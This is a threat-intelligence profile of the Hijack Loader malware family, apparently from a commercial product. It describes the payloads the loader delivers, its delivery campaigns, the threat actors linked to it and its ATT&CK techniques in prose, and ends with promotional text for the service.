Hijack Loader
Hijack Loader is a modular Windows malware loader, also referred to in the provided content as DOILoader and IDAT Loader, that serves as a conduit for additional payloads including information stealers and remote access trojans. Reported follow-on malware delivered via Hijack Loader includes Rhadamanthys, Lumma Stealer, RedLine Stealer, Atomic Stealer, ACR Stealer, and Remcos RAT. In one described chain, a DLL decrypts embedded data, reconstructs the Hijack Loader payload in memory, and injects shellcode into a newly spawned process; another report states RenEngine Loader decrypts, stages, and transfers execution to Hijack Loader. The malware has been described as using signed legitimate code-signing certificates to evade detection, and campaigns involving it have used in-memory reconstruction, DLL side-loading, module stomping, process injection, and scheduled-task persistence.
Observed delivery vectors in the content include compromised websites and the ClearFake framework, ClickFix-style fake CAPTCHA or troubleshooting lures, SEO poisoning, malicious installers, pirated or cracked software themes, and compromised YouTube channels. ClearFake campaigns delivered Hijack Loader to Windows systems, and separate ClickFix campaigns used Hijack Loader to drop RedLine Stealer. A GPUGate campaign used a malicious installer targeting users searching for developer tools to deliver Hijack Loader and Atomic Stealer. Compromised YouTube accounts advertised cracked software such as Adobe Photoshop via MSI installers that deployed Hijack Loader and then Rhadamanthys. The malware has also appeared in campaigns using fake Cloudflare CAPTCHA pages and in CastleLoader-related ecosystems.
The content links Hijack Loader to multiple threat actors and operations. It was targeted in the May 2025 Operation Endgame action. A Russia-aligned threat actor tracked as UAC-0184 / Hive0156 used Viber-delivered spearphishing against Ukrainian military and government entities, including the Verkhovna Rada, with weaponized ZIP archives containing malicious LNK files that ultimately deployed Hijack Loader and then Remcos RAT. In that activity, legitimate executables such as CFlux.exe and Chime.exe were abused for DLL side-loading, and Remcos RAT was injected into Chime.exe. The content also notes broader criminal use of Hijack Loader in campaigns distributing stealers and RATs across Windows environments.
High-confidence behavioral details from the content include use as a secondary or intermediate loader, decryption and staging of payloads in memory, shellcode injection into spawned processes, deployment of Remcos RAT via injection into Chime.exe, environmental checks for security software in at least one campaign, and persistence via scheduled tasks. No standalone network indicators or hashes are provided in the content.
Hunt this family in your stack
Mallory pivots from this family to the IOCs, detections, and named campaigns that touch your stack, and pages you when something new lands.
Groups observed using it
1 distinct threat actor attributed by public researchers. Open in Mallory to see the full evidence chain and overlapping campaigns.
Credential Theft and Remote Access Surge as AllaKore, PureRAT, and Hijack Loader Proliferate
Techniques & procedures
8 distinct techniques documented for this family, organized by ATT&CK tactic.
Resource Development
1 technique“creates a throwaway GitHub account and forks… edits the download link… used sponsored ads… to promote their commit… deliver Hijack Loader and Atomic Stealer.”
Initial Access
1 techniqueClearFake is a malicious JavaScript framework deployed on compromised websites to deliver malware through the drive-by download technique.
Execution
1 technique"Victims are prompted to download and run a fake application..." and "instructions ... urges targets to run an executable file (\"setup.exe\")"
Stealth
3 techniques"distributed via a heavily obfuscated Inno Setup installer"; "Delivered via a downloader in a ZIP archive"; "illegally modified game installers distributed via piracy platforms"
"threat actors are exploiting the situation to distribute Remcos RAT ... under the guise of providing a hotfix" and "phishing email impersonating CrowdStrike recruitment"
Discovery
1 techniqueCommand and Control
1 technique"distributing a ZIP archive file named 'crowdstrike-hotfix.zip,' which contains a malware loader..."
Other
1 techniqueIOCs tracked for this family
3 indicators attributed across vendor reports, sandbox runs, and researcher write-ups. Full values are available in Mallory.
IPs, domains, and DNS infrastructure linked to this family.
Recent activity
18 sources tracked across advisories, community write-ups, and news. New activity surfaces here as Mallory finds it.
Multi-stage loader delivered via a repo-squatting / Google Ads campaign (GPUGate) using a trojanized installer.
Secondary-stage loader used in RenEngine Loader campaigns to ultimately deploy Lumma Stealer.
Loader referenced as proliferating in campaigns targeting Mexican organizations (per summary).
Malware loader updated with call stack spoofing and other evasion/persistence features (as described).
The version that knows your environment.
Match every observed IP, domain, and hash against your live telemetry.
Named campaigns wielding this family, with evidence pinned to each claim.
CVEs this family uses for access and lateral movement.
YARA, Sigma, Snort, and vendor rules, auto-deployed to your SIEM.
Every documented technique, ranked by evidence weight.
Reddit, Mastodon, and CTI community discussion around this family.